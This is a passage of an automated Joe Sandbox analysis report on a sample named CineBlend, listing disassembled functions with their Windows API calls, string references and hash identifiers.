Function 00B7DB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B7DB23: _free.LIBCMT ref: 00B7DB4C

_free.LIBCMT ref: 00B7DBAD

Part of subcall function 00B72D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?), ref: 00B72D4E
Part of subcall function 00B72D38: GetLastError.KERNEL32(?,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?,?), ref: 00B72D60

_free.LIBCMT ref: 00B7DBB8
_free.LIBCMT ref: 00B7DBC3
_free.LIBCMT ref: 00B7DC17
_free.LIBCMT ref: 00B7DC22
_free.LIBCMT ref: 00B7DC2D
_free.LIBCMT ref: 00B7DC38

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction ID: 1f149f7ce85518ac7d487d5d689a838c4a7d1606e4784bb7b8c7875d471d4f36
Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction Fuzzy Hash: E3111C72541B04EAD631BBB0CC07FCB77ECAF14740F418CE9B2ADAA252DA75B6098650

Function 00BAE30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00BAE328
LoadStringW.USER32(00000000), ref: 00BAE32F
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00BAE345
LoadStringW.USER32(00000000), ref: 00BAE34C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00BAE390

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00BAE36D

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 9e78e1ef094e451cdd6a8417a453c375704b7e38ba6976f57c7fca4b1b630a8f
Instruction ID: 6bb5f8937f0461edb3e0b764ee26dc324b3b3784bc53f1c12771bb7388b44f5c
Opcode Fuzzy Hash: 9e78e1ef094e451cdd6a8417a453c375704b7e38ba6976f57c7fca4b1b630a8f
Instruction Fuzzy Hash: 900186F29002087FE71197A48D89EFBB7ACDB08700F0145A2B759E7041FA74DE848B75

Function 00BB1312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00BB1322
EnterCriticalSection.KERNEL32(00000000,?), ref: 00BB1334
TerminateThread.KERNEL32(00000000,000001F6), ref: 00BB1342
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00BB1350
CloseHandle.KERNEL32(00000000), ref: 00BB135F
InterlockedExchange.KERNEL32(?,000001F6), ref: 00BB136F
LeaveCriticalSection.KERNEL32(00000000), ref: 00BB1376

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: e375b2064d7d6980ed7e646a9a132564854fac8538ee4872540f6925bf82cf8f
Instruction ID: 9afd5f7351719dbfd0d47e338da1d931d8f805a4c98daae2da169ee1cd01be98
Opcode Fuzzy Hash: e375b2064d7d6980ed7e646a9a132564854fac8538ee4872540f6925bf82cf8f
Instruction Fuzzy Hash: 06F0EC32043612BBD7411B54EE59BD6FB79FF05312F801522F141928A0EB749471CF94

Function 00BC26BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00BC281D
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00BC283E
WSAGetLastError.WSOCK32 ref: 00BC284F
htons.WSOCK32(?,?,?,?,?), ref: 00BC2938
inet_ntoa.WSOCK32(?), ref: 00BC28E9

Part of subcall function 00BA433E: _strlen.LIBCMT ref: 00BA4348

Part of subcall function 00BC3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00BBF669), ref: 00BC3C9D

_strlen.LIBCMT ref: 00BC2992

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 2915f8906ba8cfa693c3ca335f3acc065cb214c67bbfe74d1cfe474fcbf369b1
Instruction ID: 3be602a8ccdb42accfed0f782cd46527c4ea5a8c6f293739bd974303e721b75c
Opcode Fuzzy Hash: 2915f8906ba8cfa693c3ca335f3acc065cb214c67bbfe74d1cfe474fcbf369b1
Instruction Fuzzy Hash: 17B19D35604300AFD324DF24C895F2ABBE5EF84318F54899CF49A5B2A2DB71EE45CB91

Function 00B70527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00B7042A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B70446
__allrem.LIBCMT ref: 00B7045D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B7047B
__allrem.LIBCMT ref: 00B70492
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B704B0

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 675459f4f124bd2af17bf05e9c9e87198950a75667ee82f7844c946ca9c63f73
Instruction ID: 28e4e0822bd489591987173aa460052c503ebc519e6299c2e956b20d8e3fc3e9
Opcode Fuzzy Hash: 675459f4f124bd2af17bf05e9c9e87198950a75667ee82f7844c946ca9c63f73
Instruction Fuzzy Hash: 8F81C572610706DBE724BF69CC81B6A73F9EF54324F24C1ABE639D6681E770D9008B94

Function 00B76571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00B68649,00B68649,?,?,?,00B767C2,00000001,00000001,8BE85006), ref: 00B765CB
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00B767C2,00000001,00000001,8BE85006,?,?,?), ref: 00B76651
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B7674B
__freea.LIBCMT ref: 00B76758

Part of subcall function 00B73B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B60165,?,?,00BB11D9,0000FFFF), ref: 00B73BC5

__freea.LIBCMT ref: 00B76761
__freea.LIBCMT ref: 00B76786

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: d026af6dece80900d6c0916d6c0c46fb62ead1d206d5127f426fd4e21f8c25ba
Instruction ID: 028990a9074aa5e2c0d281a3b4c7a66caa0ef449cce530778563bff26686cbca
Opcode Fuzzy Hash: d026af6dece80900d6c0916d6c0c46fb62ead1d206d5127f426fd4e21f8c25ba
Instruction Fuzzy Hash: 5F510472610606AFDB298F64CC81EBB77EAEB40794F1486A9FC3DD6140EB34DC50D6A0

Function 00BCC63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333

Part of subcall function 00BCD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BCC10E,?,?), ref: 00BCD415
Part of subcall function 00BCD3F8: _wcslen.LIBCMT ref: 00BCD451
Part of subcall function 00BCD3F8: _wcslen.LIBCMT ref: 00BCD4C8
Part of subcall function 00BCD3F8: _wcslen.LIBCMT ref: 00BCD4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BCC72A
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BCC785
RegCloseKey.ADVAPI32(00000000), ref: 00BCC7CA
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00BCC7F9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00BCC853
RegCloseKey.ADVAPI32(?), ref: 00BCC85F

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: a0cceff35fa44fdd0d924a647c21de2ab3f1e617917506c9d34e561801716e3f
Instruction ID: fab34b2208ce406a4463f92e4b5d7456eb156acfd9213f34c058b0c6982bc616
Opcode Fuzzy Hash: a0cceff35fa44fdd0d924a647c21de2ab3f1e617917506c9d34e561801716e3f
Instruction Fuzzy Hash: 3C819D30208241AFC714DF24C895F2ABBE5FF84308F1485ADF5998B2A2DB31ED05CB92

Function 00BA009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 00BA00A9
SysAllocString.OLEAUT32(00000000), ref: 00BA0150
VariantCopy.OLEAUT32(00BA0354,00000000), ref: 00BA0179
VariantClear.OLEAUT32(00BA0354), ref: 00BA019D
VariantCopy.OLEAUT32(00BA0354,00000000), ref: 00BA01A1
VariantClear.OLEAUT32(?), ref: 00BA01AB

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 3ad356a355eacb01a35367aceedba67eedbc1836c2af1c8cf5d2a3a0e22d1a4c
Instruction ID: df2f507c2d85df3ae381d20f000898d08a42795cfbae3e766ebadf7c8e81548b
Opcode Fuzzy Hash: 3ad356a355eacb01a35367aceedba67eedbc1836c2af1c8cf5d2a3a0e22d1a4c
Instruction Fuzzy Hash: 9651C331624314AACF20BB6498D9B6DB3E5EF57310F2484C7F906EF296DA709C44CB96

Function 00BB9B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00B441EA: _wcslen.LIBCMT ref: 00B441EF

Part of subcall function 00B48577: _wcslen.LIBCMT ref: 00B4858A

GetOpenFileNameW.COMDLG32(00000058), ref: 00BB9F2A
_wcslen.LIBCMT ref: 00BB9F4B
_wcslen.LIBCMT ref: 00BB9F72
GetSaveFileNameW.COMDLG32(00000058), ref: 00BB9FCA

Strings

X, xrefs: 00BB9E57

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 33d930a39dd1c881284505365035875262bc7367d23d004ffa79ac510863c2c8
Instruction ID: 4ceadc6ff21498138814a284784ae22b9135567e55434d560f5fb39ebea2533c
Opcode Fuzzy Hash: 33d930a39dd1c881284505365035875262bc7367d23d004ffa79ac510863c2c8
Instruction Fuzzy Hash: 5BE184319043409FD724EF25C881BAAB7E5FF85314F0485ADF9899B2A2DB71ED05CB92

Function 00BB6ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BB6F21
CoInitialize.OLE32(00000000), ref: 00BB707E
CoCreateInstance.OLE32(00BE0CC4,00000000,00000001,00BE0B34,?), ref: 00BB7095
CoUninitialize.OLE32 ref: 00BB7319

Strings

.lnk, xrefs: 00BB6EFF, 00BB6F69, 00BB7025

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: c82de377fafdea5b606dfcb525179690620dc5ebfff83740b8ee8aa76c1ac58d
Instruction ID: d55ecab9584d21cb9009e4419b7bcdb9da4b0bb43e4186484881a881d5484621
Opcode Fuzzy Hash: c82de377fafdea5b606dfcb525179690620dc5ebfff83740b8ee8aa76c1ac58d
Instruction Fuzzy Hash: 22D12971508201AFC304EF24C881EABB7E8FF99704F5049ADF5959B262DB71EE45CB92

Function 00B41B00 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00B4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B424B0

BeginPaint.USER32(?,?,?), ref: 00B41B35
GetWindowRect.USER32(?,?), ref: 00B41B99
ScreenToClient.USER32(?,?), ref: 00B41BB6
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00B41BC7
EndPaint.USER32(?,?,?,?,?), ref: 00B41C15
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00B83287

Part of subcall function 00B41C2D: BeginPath.GDI32(00000000), ref: 00B41C4B

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 903e49578882446f7e3e188bba32b201056112b6da09cb85fb53fb4b42bafdf1
Instruction ID: b2185935dbbaf5a2fa88a6dd35e936503a6a0788c871a304edcfeda3845babf9
Opcode Fuzzy Hash: 903e49578882446f7e3e188bba32b201056112b6da09cb85fb53fb4b42bafdf1
Instruction Fuzzy Hash: B741B570505300AFDB10EF18DCC5FBA7BE8EB45720F0405A9F5948B2B1D7319984EB62

Function 00BD8C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00B9FBEF,00000000,?,?,00000000,?,00B839E2,00000004,00000000,00000000), ref: 00BD8CA7
EnableWindow.USER32(?,00000000), ref: 00BD8CCD
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00BD8D2C
ShowWindow.USER32(?,00000004), ref: 00BD8D40
EnableWindow.USER32(?,00000001), ref: 00BD8D66
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00BD8D8A

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: b7412e7fb595af25dc4757d2c6f46f2be50458a76a0cc6902227f9022168bbee
Instruction ID: 4994876aad82d92ef815a5948207c8da52205ee85e46a31153029b6e2070df97
Opcode Fuzzy Hash: b7412e7fb595af25dc4757d2c6f46f2be50458a76a0cc6902227f9022168bbee
Instruction Fuzzy Hash: CF418334602244EFDB25DF24C895BE5BBF2FB46705F1840EAE5484B3A2EB31A856CB50

Function 00BC2D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00BC2D45

Part of subcall function 00BBEF33: GetWindowRect.USER32(?,?), ref: 00BBEF4B

GetDesktopWindow.USER32 ref: 00BC2D6F
GetWindowRect.USER32(00000000), ref: 00BC2D76
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00BC2DB2
GetCursorPos.USER32(?), ref: 00BC2DDE
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00BC2E3C

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 0e1b398597576848e26ca8fe6a9a5fa2c082ed6dee04b713a10496916c87b13d
Instruction ID: 7d9a5061175206cf8f2b93d0fb4219cebbc99a7f0dd0362833aab56aee9d29df
Opcode Fuzzy Hash: 0e1b398597576848e26ca8fe6a9a5fa2c082ed6dee04b713a10496916c87b13d
Instruction Fuzzy Hash: E831D072505316ABC720DF18D845FABB7E9FB95314F00096EF89597181DA30E909CBE2

Function 00BA55E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00BA55F9
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00BA5616
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00BA564E
_wcslen.LIBCMT ref: 00BA566C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00BA5674
_wcsstr.LIBVCRUNTIME ref: 00BA567E

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 295f6f7e2afb14ae96b599a9a2de76d9b9ada571ed3c236ad66a27c5dfe4ae56
Instruction ID: f0a180262b1bd1060a9ba4f59592bc03bcce0fd3e5223a1db5b1fc3df5c3183d
Opcode Fuzzy Hash: 295f6f7e2afb14ae96b599a9a2de76d9b9ada571ed3c236ad66a27c5dfe4ae56
Instruction Fuzzy Hash: 4A213832208600BBEB255B39DC49E7FBBECDF46710F1440AAF905DA091EF74CE4186A0

Function 00BB6263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00B45851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B455D1,?,?,00B84B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00B45871

_wcslen.LIBCMT ref: 00BB62C0
CoInitialize.OLE32(00000000), ref: 00BB63DA
CoCreateInstance.OLE32(00BE0CC4,00000000,00000001,00BE0B34,?), ref: 00BB63F3
CoUninitialize.OLE32 ref: 00BB6411

Strings

.lnk, xrefs: 00BB62BB, 00BB6306, 00BB63CA

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: ed198cfe99abc1e06453f7deff514f9e73d2888cb2280216349a4660c8007dc6
Instruction ID: 2480a2a53c60345f7031104a4a66c7267a0578cb1d1c10f8812aae66f7d508d9
Opcode Fuzzy Hash: ed198cfe99abc1e06453f7deff514f9e73d2888cb2280216349a4660c8007dc6
Instruction Fuzzy Hash: A4D13171A042019FCB14EF28C480AAEBBE5FF89714F148899F8859B361DB75ED45CB92

Function 00BD86FC Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00BD8740
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00BD8765
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00BD877D
GetSystemMetrics.USER32(00000004), ref: 00BD87A6
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00BBC1F2,00000000), ref: 00BD87C6

Part of subcall function 00B4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B424B0

GetSystemMetrics.USER32(00000004), ref: 00BD87B1

Memory Dump Source

